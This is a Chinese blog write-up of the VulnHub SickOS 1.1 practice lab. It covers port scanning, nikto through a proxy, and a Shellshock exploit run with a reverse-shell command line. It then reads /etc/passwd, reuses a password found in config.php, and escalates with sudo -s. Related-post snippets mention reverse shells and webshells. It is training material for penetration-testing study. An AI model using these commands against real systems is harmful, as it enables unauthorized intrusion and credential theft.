OSCP - SickOS:1.1 writeup

最新推荐文章于 2024-04-29 22:05:16 发布
原创 最新推荐文章于 2024-04-29 22:05:16 发布 · 806 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#vulhub

本文介绍了在Vulhub的SickOS 1.1环境中,通过nmap进行端口扫描,利用CGI漏洞(CVE-2014-6271)进行exploit,最终通过sudo -s实现提权的完整过程。重点涉及 nikto漏扫、shellshock漏洞和配置文件分析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

主机来源:www.vulnhub.com

下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z

用到的知识点:

nikto漏扫

cgi漏洞

sudo -s提权

发现IP

安装成功后,查找此虚拟机的IP,我使用的是netdiscover

地址为10.0.3.143

nmap

nmap -sV -p- 10.0.3.143

漏扫

想了一下突破口肯定不是ssh,就从3128端口入手把,是个代理,那就通过这个代理扫描后面的站点

nikto -h 10.0.3.143 -useproxy http://10.0.3.143:3128

exploit

看到有个shellshock的洞,CVE编号是CVE2014-6271,还可以发现漏洞的路径是/cgi-bin/status

我们打下payload,exp可以这里下载

https://www.exploit-db.com/exploits/34900

python 34900.py payload=reverse rhost=10.0.3.143 lhost=10.0.3.141 lport=555 proxy=10.0.3.143:3128 pages=/cgi-bin/status/

然后就获得了一个不太好使但能用的shell

这期间尝试过直接提权,然后并没有成功,就在想其他方法。

想到这是个站点,就去看看网站目录下都有什么把。

 看到了什么,看到了config.php,来看看文件内容吧

 好东西,接下来看看这台机器的用户都有哪些,

cat /etc/passwd

这些用户名都试一下,看哪个密码是john@123

我猜是sickos,因为机器名字是这个,废话不多说,直接试把

提权

劳动人民的智慧,看下sudo列表

这就是传说中的送分题?

直接sudo -s

over

真over

 

VulnHub-SickOs1.1
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
OSCP-Resources:有助于准备OSCP考试的资源集合
03-07
OSCP资源 有助于准备OSCP考试的资源的集合。 虚拟机/实验室环境 有大量的在线实验室环境可帮助您及时了解漏洞(新旧漏洞)。 HackTheBox -在线实验室环境- VulnHub -弱势虚拟机- TryHackMe -在线实验室环境- ...
Vulhub sickos1.1
hee_mee的博客
05-06 378
NilZero
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 2137
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
红队渗透靶场之SickOs1.1
xf555er的博客
12-06 1232
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
SICKOS: 1.1(内含两种解法)
Mysmycbx的博客
03-18 843
但是通过阅读博客,没有啥信息,web上也不到默认用户和密码。扫3128,也扫不到任何东西,那就把3128做代理扫描80端口,扫描到几个文件,一一查看。发现可以编辑php代码,直接写入反弹shell,go。写入,保存,监听,访问,一气呵成。没扫到啥有用的信息,但是博客肯定有后台呀,这里没有搜到,去网上去搜搜。原来是定时执行connect.py文件,那就构造个反弹shell,写入文件中。通过阅读web目录下的文件,发现了数据库连接文件,发现到一个密码。通过搜索,发现3128端口是负责代理的。
OSCP-MarkdownReportingTemplates:Markdown报告模板和Pandoc样式参考可轻松生成OSCPPWK的时尚报告
05-15
OSCP / PWK降价报告模板和Pandoc参考样式 我写有关如何使用这些模板轻松生成漂亮报告。 此存储库包含我用于OSCP / PWK实验室和考试报告的模板,以及用于将降价报告转换为(相对)外观优美且井井有条的报告的基本...
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
谷歌师兄的leetcode刷题笔记-OSCP-Prep:OSCP准备
06-30
谷歌师兄的leetcode刷题笔记OSCP-准备 PWK 课程大纲 OSCP 喜欢 VulnHub 游戏 Linux 和 Bash Linux 之旅 - Bash 初学者 - 解释壳—— 基本工具 Netcat:整个课程中最重要的工具。 了解它的作用、您有哪些选项、反向 ...
OSCP-BoF:这是有关了解#OSCP考试中存在的#BoF机器的演练
05-04
触发BoF(这对OSCP有利,因为它们为您提供了代码段) 查找EIP偏移 确认偏移 找到坏蛋 确认错误字符+查找JMP ESP指令 确认代码执行(pop calc) 利用主机 它基于“”项目(顺便说一句,对此进行了令人敬畏的解释)...
vulhub——SickOs: 1.1
战神/calmness的博客
06-04 602
下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 目标机器地址:192.168.243.137 攻击机器地址:192.168.18.148 目录 信息收集 扫描 设置代理 wolfcms 上传木马 并且 访问 SSH登录 sudo提权 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubunt..
SickOs1.1
m0_66299232的博客
09-23 1362
其后台入口是http://192.168.166.129/wolfcms/?nmap -p- -A -T4 -sV 192.168.166.129 //探测目标靶机开放端口和相应服务情况。6.使用weevely连接木马,因为url需要代理才可以访问,这里需要现在环境变量中配置代理。上传成功,下一步用weevely来连接,连接的时候后面一定也要带cmd 这是密码。7.连接成功后在网站目录下发现config.php文件,发现数据库密码。cmd是密码 /root/weiqin.php 是路径。
VulnHub靶机-SickOs1.1
Slow_的博客
02-22 960
VulnHub靶机-SickOs1.1 下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 下载靶机后在VMware Workstation下打开,网卡配置为桥接 任务:提权并获取flag 攻击机:kali linux 192.168.8.195 靶机:192.168.8.194 文章目录VulnHub靶机-SickOs1.1一、信息搜集二、Getshell三、提权 一、信息搜集 nmap探测存活主机,找到目标靶机 命令:nmap -sP 192.168.
Vulnhub系列:SickOS1.1
Ays.Ie的博客
03-05 484
继续更新vulnhub的靶机,巩固渗透技术,分享做题思路,打开思维局限
靶机SickOs1.1
学习!冲冲冲!
02-12 253
靶机SickOs1.1
12-vulnhub-SickOs 1.1
尼德霍格007
08-03 464
vulnhub-SickOs 1.1 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-8-2 一、信息收集 扫描目标主机ip地址 nmap -sP 192.168.21.0/24 可以看到靶机ip地址是192.168…21.148,192.168.21.128是kali攻击机的ip地址 接下来扫描开放的端口 nmap -A -p 1-64000 192.168.
Vulnhub靶机:SICKOS_ 1.1
LainWith的博客
12-09 793
SickOs(此系列共2台)发布日期:2015年12月11日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描代理扫描搜寻网站后台后台写入shell计划任务提权破壳漏洞拿shell。
红队靶机渗透-SickOS1.1
最新发布
m0_57967573的博客
04-29 848
主机发现之后,分别用nmap的TCP和UDP扫描发现三个端口,8080存疑,未开放端口,3128是一个squid代理服务器,22 SSH端口 8080无法访问;3128提示报错信息,目录爆破也没有任何信息,由于它是代理服务器,因此以3128端口做代理进行目录扫描,得到了新的有价值web目录 通过在浏览器上把3128设置为代理服务器,访问到了靶机的web页面,看到了wolfcms内容管理系统······
No.12-VulnHub-SickOs: 1.1-Walkthrough渗透学习
qq_34801745的博客
01-10 3010
** VulnHub-SkyTower: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 靶机难度:中级(CTF) 靶机发布日期:2015年12月11日 靶机描述:这个CTF明确地比喻了如何在网络上执行黑客策略,以在安全的环境中危害网络。 这个虚拟机与我在OSCP中遇到的实验室非常相似。 目的是破坏网络/计算机并...
OSCP-PWK: 优化Kali Linux配置与终端美化指南
"OSCP-PWK-master"作为压缩包文件的名称,暗示了包含的文件可能是与OSCP认证相关或者与Penetration Testing with Kali(PWK)课程相关的资料。"master"通常表示这是主文件或者是文件的最新版本。这可能是一个包含了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值